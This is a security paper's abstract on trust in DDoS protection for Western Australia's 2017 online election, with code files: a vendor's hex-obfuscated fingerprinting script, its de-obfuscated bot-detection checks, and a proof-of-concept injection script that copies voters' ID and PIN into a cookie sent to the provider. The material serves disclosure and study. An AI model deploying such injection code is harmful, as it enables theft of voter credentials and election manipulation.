Trust Implications of DDoS Protection in Online Elections

Online elections make a natural target for distributed denial of service attacks. Election agencies wary of disruptions to voting may procure DDoS protection services from a cloud provider. However, current DDoS detection and mitigation methods come at the cost of significantly increased trust in the cloud provider. In this paper we examine the security implications of denial-of-service prevention in the context of the 2017 state election in Western Australia, revealing a complex interaction between actors and infrastructure extending far beyond its borders. Based on the publicly observable properties of this deployment, we outline several attack scenarios including one that could allow a nation state to acquire the credentials necessary to man-in-the-middle a foreign election in the context of an unrelated domestic law enforcement or national security operation, and we argue that a fundamental tension currently exists between trust and availability in online elections.

==> code/cookie.js <==
navigator=true, navigator.vendor=, ... eval.toString().length=37, digest=#12345678,123456

==> code/de-obfuscated-objects.js <==
var o = [
	["navigator", "exists"],
	["navigator.vendor", "value"],
	["navigator.appName", "value"],
	["navigator.plugins.length==0", "value"],
	["navigator.platform", "value"],
	["navigator.webdriver", "value"],
	["platform", "plugin_extentions"],
	["ActiveXObject", "exists"],
	["webkitURL", "exists"],
	["_phantom", "exists"],
	["callPhantom", "exists"],
	["chrome", "exists"],
	["yandex", "exists"],
	["opera", "exists"],
	["opr", "exists"],
	["safari", "exists"],
	["awesomium", "exists"],
	["puffinDevice", "exists"],
	["__nightmare", "exists"],
	["_Selenium_IDE_Recorder", "exists"],
	["document.__webdriver_script_fn", "exists"],
	["document.$cdc_asdjflasutopfhvcZLmcfl_", "exists"],
	["process.version", "exists"],
	["navigator.cpuClass", "exists"],
	["navigator.oscpu", "exists"],
	["navigator.connection", "exists"],
	["window.outerWidth==0", "value"],
	["window.outerHeight==0", "value"],
	["window.WebGLRenderingContext", "exists"],
	["document.documentMode", "value"],
	["eval.toString().length", "value"]
];

==> code/inject_script_commented.js <==
//Set variables - extend life of cookie to allow for time to type VoterId and PIN
var _u, _p, _d = new Date();
_d.setTime(_d.getTime() + (600 * 1000));
//Change Listener - Adds voterId and PIN to end of existing cookie
function _s() {
    document.cookie = document.cookie.split("#")[0] + "#" + _u.value + "," + _p.value + "; expires=" + _d.toGMTString() + "; path=/";
}
//Function to add on change listeners to VoterID and PIN inputs
function _t() {
    _u = document.getElementById("input_txt_user"), _p = document.getElementById("input_pass_pass");
    //Check document has loaded
    if (_u == undefined) {
        //Document still loading, try again in 500ms
        window.setTimeout(500, _t);
    } else {
        //Document loaded add onChange listener
        _u.addEventListener("change", _s);
        _p.addEventListener("change", _s);
        _s();
    }
}
//Delay running of script to wait for document to load
window.setTimeout(_t, 500);

==> code/obfuscated-clipped.js <==

(function() { var z="";var b="2866756e6374...<9660 characters clipped for brevity>";for (var i=0;i<b.length;i+=2){z=z+parseInt(b.substring(i, i+2), 16)+",";}z = z.substring(0,z.length-1); eval(eval('String.fromCharCode('+z+')'));})();

==> code/obfuscated.js <==

(function() { var z="";var b="2866756e6374696f6e2829207b0a2066756e6374696f6e2067657453657373696f6e436f6f6b6965732829207b0a0976617220636f6f6b69654172726179203d206e657720417272617928293b0a0976617220634e616d65203d202f5e5c733f696e6361705f7365735f2f3b0a097661722063203d20646f63756d656e742e636f6f6b69652e73706c697428223b22293b0a09666f7220287661722069203d20303b2069203c20632e6c656e6774683b20692b2b29207b0a0909766172206b6579203d20635b695d2e73756273747228302c20635b695d2e696e6465784f6628223d2229293b0a09097661722076616c7565203d20635b695d2e73756273747228635b695d2e696e6465784f6628223d2229202b20312c20635b695d2e6c656e677468293b0a090969662028634e616d652e74657374286b65792929207b0a090909636f6f6b696541727261795b636f6f6b696541727261792e6c656e6774685d203d2076616c75653b0a09097d0a097d0a0972657475726e20636f6f6b696541727261793b0a207d0a2066756e6374696f6e20736574496e636170436f6f6b69652876417272617929207b0a09766172207265733b0a09747279207b0a090976617220636f6f6b696573203d2067657453657373696f6e436f6f6b69657328293b0a09097661722064696765737473203d206e657720417272617928636f6f6b6965732e6c656e677468293b0a0909666f7220287661722069203d20303b2069203c20636f6f6b6965732e6c656e6774683b20692b2b29207b0a090909646967657374735b695d203d2073696d706c65446967657374282876417272617929202b2063obfuscated-clipped6f6f6b6965735b695d293b0a09097d0a0909726573203d20764172726179202b20222c6469676573743d22202b2028646967657374732e6a6f696e2829293b0a097d20636174636820286529207b0a0909726573203d20764172726179202b20222c6469676573743d22202b2028656e636f6465555249436f6d706f6e656e7428652e746f537472696e67282929293b0a097d0a09637265617465436f6f6b696528225f5f5f75746d7663222c207265732c203230293b0a207d0a2066756e6374696f6e2073696d706c65446967657374286d7973747229207b0a0976617220726573203d20303b0a09666f7220287661722069203d20303b2069203c206d797374722e6c656e6774683b20692b2b29207b0a0909726573202b3d206d797374722e63686172436f646541742869293b0a097d0a0972657475726e207265733b0a207d0a2066756e6374696f6e20637265617465436f6f6b6965286e616d652c2076616c75652c207365636f6e647329207b0a097661722065787069726573203d2022223b0a09696620287365636f6e647329207b0a09097661722064617465203d206e6577204461746528293b0a0909646174652e73657454696d6528646174652e67657454696d652829202b20287365636f6e6473202a203130303029293b0a09097661722065787069726573203d20223b20657870697265733d22202b20646174652e746f474d54537472696e6728293b0a097d0a09646f63756d656e742e636f6f6b6965203d206e616d65202b20223d22202b2076616c7565202b2065787069726573202b20223b20706174683d2f223b0a207d0a2066756e6374696f6e2074657374286f29207b0a0976617220726573203d2022223b0a0976617220764172726179203d206e657720417272617928293b0a09666f722028766172206a203d20303b206a203c206f2e6c656e6774683b206a2b2b29207b0a09207661722074657374203d206f5b6a5d5b305d3b0a092073776974636820286f5b6a5d5b315d29207b0a092009636173652022657869737473223a0a0909747279207b0a090909696628747970656f66286576616c2874657374292920213d2022756e646566696e656422297b0a090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742874657374202b20223d7472756522293b0a0909097d0a090909656c73657b0a090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742874657374202b20223d66616c736522293b0a0909097d0a09097d20636174636820286529207b0a0909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742874657374202b20223d66616c736522293b0a09097d0a0909627265616b3b0a090963617365202276616c7565223a0a09097472797b0a090909747279207b0a09090909726573203d206576616c2874657374293b0a09090909696628747970656f662872657329203d3d3d2022756e646566696e656422297b0a09090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742874657374202b20223d756e646566696e656422293b0a090909097d0a09090909656c736520696628726573203d3d3d206e756c6c297b0a09090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742874657374202b20223d6e756c6c22293b0a090909097d0a09090909656c7365207b0a09090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742874657374202b20223d22202b207265732e746f537472696e672829293b0a090909097d0909090a0909097d20636174636820286529207b0a090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742874657374202b20223d63616e6e6f74206576616c7561746522293b0a09090909627265616b0a0909097d0a090909627265616b3b0a09097d0a0909636174636820286529207b0a0909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742874657374202b20223d22202b2065293b0a09097d0a0909636173652022706c7567696e5f657874656e74696f6e73223a0a0909747279207b0a09090976617220657874656e74696f6e73203d205b5d3b0a090909747279207b0a0909090969203d20657874656e74696f6e732e696e6465784f6628226922293b0a0909097d20636174636820286529207b0a090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742822706c7567696e5f6578743d696e6465784f66206973206e6f7420612066756e6374696f6e22293b0a09090909627265616b3b0a0909097d0a090909747279207b0a09090909766172206e756d203d206e6176696761746f722e706c7567696e732e6c656e6774683b0a09090909696620286e756d203d3d2030207c7c206e756d203d3d206e756c6c29207b0a09090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742822706c7567696e5f6578743d6e6f20706c7567696e7322293b0a0909090909627265616b3b0a090909097d0a0909097d20636174636820286529207b0a090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742822706c7567696e5f6578743d63616e6e6f74206576616c7561746522293b0a09090909627265616b3b0a0909097d0a0909090a090909666f72202876617220693d303b693c6e6176696761746f722e706c7567696e732e6c656e6774683b692b2b29207b0a0909090969662028747970656f66286e6176696761746f722e706c7567696e735b695d29203d3d2022756e646566696e65642229207b0a09090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742822706c7567696e5f6578743d706c7567696e735b695d20697320756e646566696e656422293b0a0909090909627265616b3b0a090909097d0a0a090909097661722066696c656e616d65203d206e6176696761746f722e706c7567696e735b695d2e66696c656e616d653b0a0909090976617220657874203d20226e6f20657874656e74696f6e223b0a0909090969662028747970656f662866696c656e616d6529203d3d2022756e646566696e65642229207b0a0909090909657874203d202266696c656e616d6520697320756e646566696e6564223b0a090909097d0a09090909656c7365206966202866696c656e616d652e73706c697428222e22292e6c656e677468203e203129207b0a0909090909657874203d2066696c656e616d652e73706c697428272e27292e706f7028293b0a090909097d0a0a0909090969662028657874656e74696f6e732e696e6465784f662865787429203c203029207b0a0909090909657874656e74696f6e732e7075736828657874293b0a090909097d090a0909097d0a0909090a090909666f72092869203d20303b2069203c20657874656e74696f6e732e6c656e6774683b20692b2b29207b0a090909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742822706c7567696e5f6578743d22202b20657874656e74696f6e735b695d293b0a0909097d0a09097d0a0909636174636820286529207b0a0909097641727261795b7641727261792e6c656e6774685d203d20656e636f6465555249436f6d706f6e656e742822706c7567696e5f6578743d22202b2065293b0a09097d0a0909627265616b3b0a09207d0a097d0a09764172726179203d207641727261792e6a6f696e28293b0a0972657475726e207641727261793b0a207d0a20766172206f203d205b0a095b226e6176696761746f72222c2022657869737473225d2c0a095b226e6176696761746f722e76656e646f72222c202276616c7565225d2c0a095b226e6176696761746f722e6170704e616d65222c202276616c7565225d2c0a095b226e6176696761746f722e706c7567696e732e6c656e6774683d3d30222c202276616c7565225d2c0a095b226e6176696761746f722e706c6174666f726d222c202276616c7565225d2c0a095b226e6176696761746f722e776562647269766572222c202276616c7565225d2c0a095b22706c6174666f726d222c2022706c7567696e5f657874656e74696f6e73225d2c0a095b22416374697665584f626a656374222c2022657869737473225d2c0a095b227765626b697455524c222c2022657869737473225d2c0a095b225f7068616e746f6d222c2022657869737473225d2c0a095b2263616c6c5068616e746f6d222c2022657869737473225d2c0a095b226368726f6d65222c2022657869737473225d2c0a095b2279616e646578222c2022657869737473225d2c0a095b226f70657261222c2022657869737473225d2c0a095b226f7072222c2022657869737473225d2c0a095b22736166617269222c2022657869737473225d2c0a095b22617765736f6d69756d222c2022657869737473225d2c0a095b2270756666696e446576696365222c2022657869737473225d2c0a095b225f5f6e696768746d617265222c2022657869737473225d2c0a095b225f53656c656e69756d5f4944455f5265636f72646572222c2022657869737473225d2c0a095b22646f63756d656e742e5f5f7765626472697665725f7363726970745f666e222c2022657869737473225d2c0a095b22646f63756d656e742e246364635f6173646a666c617375746f70666876635a4c6d63666c5f222c2022657869737473225d2c0a095b2270726f636573732e76657273696f6e222c2022657869737473225d2c0a095b226e6176696761746f722e637075436c617373222c2022657869737473225d2c0a095b226e6176696761746f722e6f73637075222c2022657869737473225d2c0a095b226e6176696761746f722e636f6e6e656374696f6e222c2022657869737473225d2c0a095b2277696e646f772e6f7574657257696474683d3d30222c202276616c7565225d2c0a095b2277696e646f772e6f757465724865696768743d3d30222c202276616c7565225d2c0a095b2277696e646f772e576562474c52656e646572696e67436f6e74657874222c2022657869737473225d2c0a095b22646f63756d656e742e646f63756d656e744d6f6465222c202276616c7565225d2c0a095b226576616c2e746f537472696e6728292e6c656e677468222c202276616c7565225d0a5d3b0a20747279207b0a09736574496e636170436f6f6b69652874657374286f29293b0a09646f63756d656e742e637265617465456c656d656e742822696d6722292e737263203d20222f5f496e63617073756c615f5265736f757263653f53574b4d544653523d3126653d22202b204d6174682e72616e646f6d28293b0a207d20636174636820286529207b0a09696d67203d20646f63756d656e742e637265617465456c656d656e742822696d6722293b0a09696d672e737263203d20222f5f496e63617073756c615f5265736f757263653f53574b4d544653523d3126653d22202b20653b0a207d0a7d2928293b0a";for (var i=0;i<b.length;i+=2){z=z+parseInt(b.substring(i, i+2), 16)+",";}z = z.substring(0,z.length-1); eval(eval('String.fromCharCode('+z+')'));})();

==> code/script.js <==
<script type="text/javascript">
//<![CDATA[
(function() {
var _analytics_scr = document.createElement('script');
_analytics_scr.type = 'text/javascript'; _analytics_scr.async = true; _analytics_scr.src = '/_Incapsula_Resource?SWJIYLWA=2977d8d74f63d7f8fedbea018b7a1d05&ns=1';
var _analytics_elem = document.getElementsByTagName('script')[0]; _analytics_elem.parentNode.insertBefore(_analytics_scr, _analytics_elem);
})();
// ]]>
</script>
